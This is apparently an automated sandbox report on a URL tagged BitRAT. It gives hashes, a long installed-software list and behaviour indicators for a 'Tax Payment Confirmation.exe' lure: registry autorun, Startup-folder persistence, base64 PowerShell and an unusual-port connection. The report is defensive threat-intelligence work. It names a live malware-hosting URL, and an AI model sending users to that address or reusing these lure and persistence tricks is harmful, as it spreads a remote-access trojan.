Malware analysis http://gemmeco.com//wp-include/kkf.htm Malicious activity

Add for printing

URL:	http://gemmeco.com//wp-include/kkf.htm
Full analysis:	https://app.any.run/tasks/aea3a4cc-438d-4d8c-95a6-78e6741dab74
Verdict:	Malicious activity
Analysis date:	January 17, 2024, 04:50:10
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	bitrat
Indicators:
MD5:	02E44989D12F21BA9EE626A1CDE6F499
SHA1:	823437A1B8D0328CE9F15C1C9B65A03519E60019
SHA256:	DFC372DACD07C14C0F5ED4D0314873DF7E01FCD1117338DCC65C8C6D1B6B299D
SSDEEP:	3:N1KZAII2tKiGe2V2u:C+I8lfZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 240 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 180 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.19596 KB4534251
Adobe Acrobat Reader DC (20.013.20064)
Adobe Acrobat Reader DC (20.013.20064)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Refresh Manager (1.8.0)
Adobe Refresh Manager (1.8.0)
CCleaner (6.14)
CCleaner (6.14)
FileZilla 3.65.0 (3.65.0)
FileZilla 3.65.0 (3.65.0)
Google Chrome (109.0.5414.120)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.36.31)
Google Update Helper (1.3.36.31)
Java 8 Update 271 (8.0.2710.9)
Java 8 Update 271 (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Java Auto Updater (2.8.271.9)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.175.29)
Microsoft Edge Update (1.3.175.29)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (32-bit x86) (7.9.1)
Notepad++ (32-bit x86) (7.9.1)
PowerShell 7-x86 (7.2.11.0)
PowerShell 7-x86 (7.2.11.0)
Skype version 8.110 (8.110)
Skype version 8.110 (8.110)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (3.0.11)
VLC media player (3.0.11)
WinRAR 5.91 (32-bit) (5.91.0)
WinRAR 5.91 (32-bit) (5.91.0)

Add for printing

MALICIOUS
- Changes the autorun value in the registry
  - Tax Payment Confirmation.exe (PID: 2968)
- BITRAT has been detected (YARA)
  - Tax Payment Confirmation.exe (PID: 2968)
- Drops the executable file immediately after the start
  - Tax Payment Confirmation.exe (PID: 2888)
- Create files in the Startup directory
  - Tax Payment Confirmation.exe (PID: 2888)
SUSPICIOUS
- Reads settings of System Certificates
  - Tax Payment Confirmation.exe (PID: 1740)
  - Tax Payment Confirmation.exe (PID: 2760)
  - Tax Payment Confirmation.exe (PID: 2736)
  - Tax Payment Confirmation.exe (PID: 2888)
  - Tax Payment Confirmation.exe (PID: 3196)
  - Tax Payment Confirmation.exe (PID: 2868)
- The executable file from the user directory is run by the CMD process
  - Tax Payment Confirmation.exe (PID: 2736)
  - Tax Payment Confirmation.exe (PID: 2888)
- Reads the Internet Settings
  - Tax Payment Confirmation.exe (PID: 2760)
  - Tax Payment Confirmation.exe (PID: 2736)
  - powershell.exe (PID: 2536)
  - Tax Payment Confirmation.exe (PID: 2888)
  - Tax Payment Confirmation.exe (PID: 2868)
  - Tax Payment Confirmation.exe (PID: 3196)
  - Tax Payment Confirmation.exe (PID: 1740)
- Starts CMD.EXE for commands execution
  - Tax Payment Confirmation.exe (PID: 2760)
  - Tax Payment Confirmation.exe (PID: 1740)
- Starts POWERSHELL.EXE for commands execution
  - Tax Payment Confirmation.exe (PID: 2888)
- BASE64 encoded PowerShell command has been detected
  - Tax Payment Confirmation.exe (PID: 2888)
- Base64-obfuscated command line is found
  - Tax Payment Confirmation.exe (PID: 2888)
- Using PowerShell to operate with local accounts
  - powershell.exe (PID: 2536)
- Executable content was dropped or overwritten
  - Tax Payment Confirmation.exe (PID: 2888)
- Application launched itself
  - Tax Payment Confirmation.exe (PID: 2888)
- Connects to unusual port
  - Tax Payment Confirmation.exe (PID: 2968)
INFO
- The process uses the downloaded file
  - iexplore.exe (PID: 2036)
  - WinRAR.exe (PID: 1796)
- Reads Environment values
  - Tax Payment Confirmation.exe (PID: 2736)
  - Tax Payment Confirmation.exe (PID: 1740)
  - Tax Payment Confirmation.exe (PID: 2760)
  - Tax Payment Confirmation.exe (PID: 2888)
  - Tax Payment Confirmation.exe (PID: 3196)
  - Tax Payment Confirmation.exe (PID: 2868)
- Reads the machine GUID from the registry
  - Tax Payment Confirmation.exe (PID: 2736)
  - Tax Payment Confirmation.exe (PID: 1740)
  - Tax Payment Confirmation.exe (PID: 2760)
